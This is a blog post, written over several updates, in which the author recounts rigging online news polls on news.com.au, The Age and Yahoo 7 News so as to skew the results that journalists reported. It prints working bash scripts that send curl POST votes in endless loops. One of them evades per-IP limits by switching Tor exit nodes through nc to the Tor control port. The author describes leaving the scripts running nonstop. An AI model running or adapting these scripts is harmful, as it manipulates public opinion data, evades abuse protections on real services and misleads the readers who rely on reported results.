[11/02/2013] Wow. This story just featured on ABC’s Media Watch. Click here (mirror) for their article (with video).
Last week, News Corporation ran a story (mirror) about the shock results of an online poll that indicated over 90% of the 16,000 respondents wanted to see a raise in speed limits, despite the poll being paired with an article asking motorists to slow down in consideration for elderly drivers.
Well, I have some news for you: Over 15,000 of those votes were mine.
And no, I didn’t cleverly infiltrate their systems and edit the poll by hand. That would have been rather illegal. The fact of the matter is, you can tweak any poll with relative ease without breaking any laws*. All you need to do is capitalise on the fact that there is nothing on their servers that will limit how many times or how often you vote.
I present to you, Exhibit A (mirror):
It’s one of many simple polls from the that appear from time to time on news.com.au. Vote once, and you can see the poll results. If you were wondering how much they put in place to stop you from voting again, clear your cookies and you’ll soon find that it’s essentially nothing. You could vote all day, but manual labour is for suckers. Install the “Tamper Data” Firefox plugin, and take a peek at the HTTP POST data that’s being sent to the server each time you vote:
Can you see where we’re going with this? Bash and Curl are your friends:
#!/bin/bash
while [ true ]; do
curl --data "option=1226489732707&c=News_Poll&cid=1226489732697&pagename=Foundation%2FNews_Poll%2FsaveResult&site=NewsComAu&jsEnabled=true" http://www.news.com.au/cs/Satellite | grep total-votes
done
You could watch it run all day, or you can leave it ticking away while you sleep:
So there you have it. You can achieve a greater media influence in three lines of bash than Gina Rinehart could with an 18.7% share in Fairfax.
* I am not a lawyer. This is not legal advice.
UPDATE: Despite alerting NewsCorp to this, nobody seems to be listening. It appears that poll hacking is now my part-time hobby indefinitely.
An attempt to bring back the McGratin.
It was fun watching the anti-vaxxers and the skeptics argue over this poll result. In the end I called it a draw. One day later, a response (mirror) article was written:
I wonder when they’ll realise they’ve been had.
UPDATE 14/12/2012: There’s more.
Two stories hit the front page side-by-side today, both referencing my manipulated poll results. The first mentioned two polls which I had deadlocked. I didn’t notice (and balance) the middle poll until after an article had been written on it. However, at the time this article was published, all of the polls were in deadlock:
The second article didn’t only reference the poll, it formed the entire premise of the article. It has since been removed (19/12/2012) mirror.
THEY’VE MADE CONTACT!
Today, a colleague emailed one of the authors of one of the articles to ask if they were curious as to why their poll result was deadlocked… and we actually got a response! This was collectively our fourth attempt at contacting them, and we have again provided all of the details to date. As usual, after spilling the beans, we don’t get a response. However, two days later, the first Facebook poll appears. This may be a stop-gap measure while they fix their own system, or perhaps they’ve switched permanently who knows.
In the meantime, let’s summarise my work to date with a montage:
It really shows my OCD side, doesn’t it?
UPDATE [19/12/2012]: Well, that escalated quickly (reddit helped). It appears that all references to polls (including the polls themselves) in the aforementioned articles have been removed. The articles which were based entirely on a poll result have been expunged entirely. I’ve put up mirrors for anyone who wants to see the originals. Still no word from NewsCorp. I’m just speculating here, but it looks like they’re sweeping the whole thing under the rug. Looking out my front window, there are no sightings of a party van.
UPDATE [14/01/2013]: So, I stopped gaming the polls on news.com.au after they noticed my blog and cleaned up their articles. I’d assumed that was the end of it.
I guess they haven’t learned much. In the meantime, I’ve expanded my exploit to actively crawl all seven of NewsCorp’s Australian online publications:
SMH were pretty quick to admit it when a Fairfax poll got hacked a year ago. The difference is that that they actually fixed their polling system, and added a disclaimer. It seems NewsCorp need a little more of a nudge.
You know what? I think I’ll leave this running 24/7. Here’s a live view of the polls being deadlocked.
Your move, NewsCorp.
UPDATE [06/02/2013]: Four months after being notified, they appear to have limited the amount this can be exploited. After 10 votes in a short timespan, subsequent votes originating from the same IP address are rejected. While changing your IP address between votes isn’t an impossible task to automate (using a tor proxy), it’s still orders of magnitude more difficult to do than the original exploit.
UPDATE [11/02/2013]: I must admit, the new changes to NewsCorp’s polling system made it much harder to break. Instead of three lines of bash, it now takes eight!
To be fair, this brings their polling security in line with that of Fairfax, which I broke too. Here you can see how much I can sway a poll in 7 hours on a 64k (capped) internet connection:
It seems both sites limit the number of votes coming from a single IP. To circumvent it, just set up a tor proxy and jump to another exit node every 10 votes:
#!/bin/bash
while [ true ]; do
COUNTER=0
while [ $COUNTER -lt 10 ]; do
curl --data "pollId=4016070&indexUrlPath=http%3A%2F%2Fwww.theage.com.au%2Fpolls%2Fopinion%2Ftarkine-wilderness-20130208-2e2ti.html%23poll&id=27263" -x "http://localhost:8118" --cookie "checkIfCookiesEnabled=cookiesEnabled; path=/" http://feedback.theage.com.au/action/voteForAPoll
let COUNTER+=1
done
(echo authenticate '""'; echo signal newnym; echo quit) | nc localhost 9051
done
[UPDATE 27/06/2013]
I’ve been in hiatus for a while, but I spotted this one on Facebook and had to investigate:
There’s a few things wrong with this:
- They’re reporting on poll results like it’s a trustworthy source.
- Yes.
- The 7 News online polling system is NOT secure.
To demonstrate, this script will vote for Abbott repeatedly in the aforementioned poll:
#!/bin/bash
while [ true ]; do
curl -j -c cookiefile -H "Accept-Encoding: gzip,deflate" -A "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:22.0) Gecko/20100101 Firefox/22.0" http://au.news.yahoo.com/ > /dev/null
curl -b cookiefile --data "vote={\"vote\":[\"2\"]}" http://au.news.yahoo.com/cloud/polls/vote?poll_id=3957b2bb-e3b4-3d5a-8d86-25229c0c5bba
done
I must admit, I was going around in circles for a solid hour before I figured out which cookie was required, and what I had to forward to the server to make it send it. At the end of the day, it’s a simple rinse-and-repeat process just like the others.
Their server is a bit of a pig, so you’ll need to get several threads happening to speed this one up.
Leave a Reply